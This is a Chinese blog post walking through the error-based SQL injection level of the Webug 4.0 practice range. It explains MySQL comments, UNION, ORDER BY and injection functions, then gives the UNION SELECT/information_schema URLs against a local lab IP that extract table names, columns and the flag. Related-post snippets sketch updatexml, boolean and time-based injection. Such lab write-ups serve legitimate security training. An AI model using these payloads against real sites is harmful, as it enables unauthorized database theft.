webug4.0-显错注入

最新推荐文章于 2024-03-31 12:00:00 发布
最新推荐文章于 2024-03-31 12:00:00 发布
阅读量1k 收藏 3
点赞数 1
分类专栏: 靶场练习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nex1less/article/details/100008959
版权

0x01 Mysql数据相关知识

1. mysql三种注释风格:

单行注释:sql语句后使用字符#或者--进行注释

多行注释:使用/* */将sql语句圈起来注释

内联注释:内联注释是MySQL数据库为了保持与其他数据库兼容,特意添加的新功能。把Mysql特有的语句放在/*! */中

2.Union联合查询:

1.Union操作符用于拼接两个或者多select查询语句

2.Union中的每个查询必须拥有相同的列数

3.Order by语句:

1.Order by 语句用于根据指定的列对结果集进行排序

2.Order by 语句默认按照升序对记录进行排序

4.Sql注入常用的函数:

1.

user()当前用户名
current_user()当前用户名(权限)
database()当前数据库

version()

数据库版本
@@datadir()数据库路径
load_file()读文件
into outfile() into dumpfile写文件
@@basedir()mysql安装路径

0x02 漏洞利用

 发现注入点之前先查看一下自己服务器上的phpstudy版本是不是下面这个版本:如果不是请切换,如若不然不会报错。

1.打开靶场,发现url参数id为1,尝试修改为2 发现回显hello,修改为3 发现正常无回显 我们好像意识到了什么。。。

2.探测是否为注入点,经典加  '  进行探测

 发现报错

3.简单构造语句

 发现空格没被过滤,但是#号被过滤了

4.试用#的url编码%23尝试继续注入

发现没有报错 问题解决 我们继续

5.通过union判断表中列数(也可通过order by进行探测 )

发现报错 继续探测二列

正常 并且回显2 三列不用探测就知道他是会报错的

6.使用函数替换数字1或2

发现回显

把user()改为database() 发现数据库webug,别的函数自行按照需要替换即可

7.查看webug中数据表(使用上一步探测出来的数据库webug+mysql自带的信息数据表):

http://192.168.72.136/control/sqlinject/manifest_error.php?id=3'union select 1,group_concat(table_name) from information_schema.tables where table_schema='webug' %23

 发现目标flag表

8.查看flag数据表中的数据段

http://192.168.72.136/control/sqlinject/manifest_error.php?id=3' union select 1,group_concat(column_name) from information_schema.columns where table_name='flag' %23

 发现目标flag段

 9.查看数据段内容

http://192.168.72.136/control/sqlinject/manifest_error.php?id=3' union select 1,flag from flag %23

发现flag值

10.提交flag

0x03 总结

                                                               比较简单,没有什么过滤和waf啥的,傻瓜式提交即可

nex1less
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
webug4.0通关笔记----(第一天:显错注入
liver100day的博客
04-23 743
布尔注入 布尔盲注:根据注入信息返回true or fales 没有任何报错信息 非法的用户可根据返回的报错信息,获取到数据库的重要信息 开始注入 在本次注入中,我们会频繁的使用到下面命令: length(str):返回str字符串的长度。 substr(str, pos, len):str:要截取的字符串,pos:开始截取的位置,len:截取的长度 将str从pos位置开始截取len长度的字符进 行返回。注意这里的pos位置是从1开始 的,不是数组的0开始 mid(str,pos,l
webug4.0—显错注入
Stephen Wolf
01-09 359
所用到一些知识: 1. concat(str1,str2,...) 返回结果为参数间无间隔符连接起来的字符串,如果其中有一个参数为NULL,返回结果为NULL 2. concat_ws(separator, str1, str2, ...) 含有分隔符地连接字符串,第一个参数为制定的分隔符 3. group_concat(str1,str2,...)  连接一个组的所有字符串,...
Webug4.0显错注入
weixin_44253823的博客
12-11 183
进入页面,输入单引在id=1后面加单引号页面报错。 构造查询语句1’ or 1=1%23页面正常显示。 利用order by 语句判断字段数。由1开始输入,输入3时报错,因此判断字段个数是两个。 利用version()语句获得当前数据库版本5.5.53 查询数据库名称 查看webug数据库中的内容。 查看flag表中的内容。 查看flag列中的内容。 得到flag中数据。 ...
PHP教程_PHP5函数mysql_connect协同的mysql_fetch_row函数
最新发布
goufeng93的博客
03-31 408
PHP教程 PHP5函数mysql_connect协同的mysql_fetch_row函数。
Webug4.0 sql显错注入
angry_program的博客
01-03 383
第一次实战SQL注入 作战类型 : 显错注入 目标 :拿下flag数据 目标长相 : 1. 判断注入类型 输入: and 1=1 => 正常, 再输入: and 1=2 => 还正常, 排除数字型 输入单引号: ' => 网页发生变化, 则为字符型 从报错信息可以看出是字符型, 故类型为显错注入 2. 判断字段...
webug 4.0 第一关 显错注入没有显错
03-24 1103
按照这位大佬的攻略去试了一下 发现没有显错 然后看了一下源码 因为本人是做 java 开发的,不太熟悉,调试就免了,但是乍看之下没问题,直接改代码观察一下: $res = die("Invalid query: ". mysqli_stmt_error(). $sql); " ' "被自动转义成"\'"了,所以怎么查都没问题。 ...
webug4.0-master.zip
08-26
网上都是下载虚拟机运行虚拟机,这里是提取出的webug4.0源代码
Webug4.0-Docker:Docker版本的Webug4.0
03-14
原项目地址: : 2.Docker版详细使用说明: ://linuz.me/2019/08/04/Webug-docker/ 3.映射端口只有80就可以,例如:docker run -d -p 80:80 webug4.0 4.默认账号: 后台管理员:admin / admin 数据库密码:root / ...
Webug 4.0下载地址-附件资源
03-05
Webug 4.0下载地址-附件资源
渗透学习 webug4.0靶场
07-12
渗透学习 webug4.0靶场 渗透学习 webug4.0靶场 渗透学习 webug4.0靶场
webug-显错注入
gclome的博客
05-09 894
访问靶场: (1)看到地址有id=1,改变id为2、3分别试一试 id=2 id=3 可以发现,随着id后面数值的改变,红框处的值也随之改变 (2)判断注入点类型,尝试下面语句: url?id=1) 括号无反应,看来是屏蔽了 url?id=1" 双引号无反应 url?id=1’ 单引号有结果 (3)判断字段数 id=1' order by 5 %23,利用二分法判断,3、5均报错 (mysql有三种注释方法,1、# … 2、-- … 3、/…/,%23是#的url表示) 1、2均正确,说明
webug————显错注入
weixin_55554070的博客
01-10 2614
1、打开靶场,寻找注入点进行测试 id=1 2、输入’;";),进行判断查看是否报错 输入”;)页面无变化,’出现报错,说明存在SQL注入 3、注入流程 :寻找注入点—>构造注入语句查看数据库版本与信息—>获取敏感数据或getshell。 判断数据库版本(MySQL数据库版本在5.0以上有内置库 information_schema,存储着mysql的所有数据库和表结构信息);库——表——字段——数据 4、判断字段数 order by 5、3页面报错 2页面正常,说明.
webug 1、显错注入
乔木同学
03-15 285
webug,显错注入
Webug4.0安装部署好后,显错注入打靶输入'单引号没反应的解决办法
xiong7758521的专栏
09-26 643
webug4.0搭建好之后,第一个显错注入无论是单引号还是双引号都被绕过,没有反应。 后来把php的版本有默认5.2.17切换为php-5.3.29-nts+Apache就可以了 ...
Webug4.0靶场通关笔记(第一天)--------显错注入和布尔注入
Yasso的博客
02-20 1032
一、显错注入 打开靶场试试尝试修改为id=2,回显hello。 1、首先判断注入点 插播一条,php版本必须为5.3.29,不然不会报错!!!!!!!!!!!!!!!! 尝试加单引号,会报错, (%23不能在hackbar上输入,否则会一直报错,我们来测试下在hackbar上输的%23到url上变成了%2523,很明显这是#的二次url编码)还是不用hackbar了,也可能是我的hackbar有问题。 ?id=1’ 页面报错 ?id=1’ or 1=1%23 页面显示正常 (这里#貌似被过
Webug4.0-SQL注入
baynk的博客
11-26 456
0x00 SQL注入 熟悉的感觉,熟悉的配方,还是原来的味道 0x01 显错注入 打的时候吓一跳。。原来就是个本地的,给自己打广告不好吗。。。 输入'以后就直接报错了,然后就一翻操作。 库 1' and updatexml(1,concat(0x7e,database(),0x7e),1) %23 表 1' and updatexml(1,concat(0x7e,(select group_...
靶场练习-Webug4.0-注入
Bcat_ZC的博客
08-08 122
2 布尔注入 :通过and 1=1和1=2看到不同的回显(or看到有多个hello),通过【length(database())>N】判断数据库名长度,再通过【ascII(substr(database(),x,1))=N】爆出库名,然后,然后不知道怎么弄表名只能上工具.;5 过滤注入:【‘||(if(length(database())>6,sleep(5),NULL))||’】这样可以,然后还是同上一题的方式。嗯,然后,然后,然后还是不会。7 xxe注入:暂时先过,做不出来。
webug4.0——注入
A_dmin的博客
09-09 2609
webug4.0——注入篇 今天接触到一个好玩的靶场环境~~ webug 就去下载安装玩了一下,网盘速度是真的慢,下载下一个下午!!! 附上下载链接:(内附安装教程) 链接: https://pan.baidu.com/s/1WlKzFXsNkfkzzCUR_PYtfA 提取码: jcaa 装好环境,在本地打开,界面还是不错的~ 直接开耍!!! 第一关看题目意思就知道是注入,还是报错注...
webug4.0xxe注入
07-27
XXE(XML External Entity)注入是一种攻击技术,用于利用应用程序对外部实体的处理不当。通过在用户提供的输入中插入恶意的实体引用,攻击者可以读取本地文件、执行远程请求等。针对这种注入漏洞,应用程序应该对用户输入进行严格的过滤和验证,以避免恶意实体的注入。 关于Webug 4.0的XXE注入漏洞,我不清楚具体的细节和漏洞位置。通常,修补XXE注入漏洞的方法是通过禁用外部实体的解析或限制实体解析的范围。为了更好地保护应用程序免受XXE注入攻击,您可以参考以下几点建议: 1. 输入过滤和验证:对用户输入进行严格的过滤和验证,确保只接受合法的输入。可以使用白名单过滤或正则表达式等技术来限制输入。 2. 禁用外部实体解析:在解析XML时,禁用外部实体的解析。这可以防止恶意实体的注入。 3. 限制实体解析范围:如果应用程序需要解析实体,应该限制解析的范围,只允许解析特定的实体或特定的命名空间。 4. 使用安全的XML解析器:确保使用最新版本的XML解析器,并开启安全配置选项,以防止XXE注入攻击。 请注意,以上建议仅为一般性指导,具体修补漏洞需要根据应用程序和环境的特定情况来确定。建议您在修复漏洞之前,先了解Webug 4.0的文档、漏洞报告或咨询安全专家以获取更准确的信息和解决方案。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值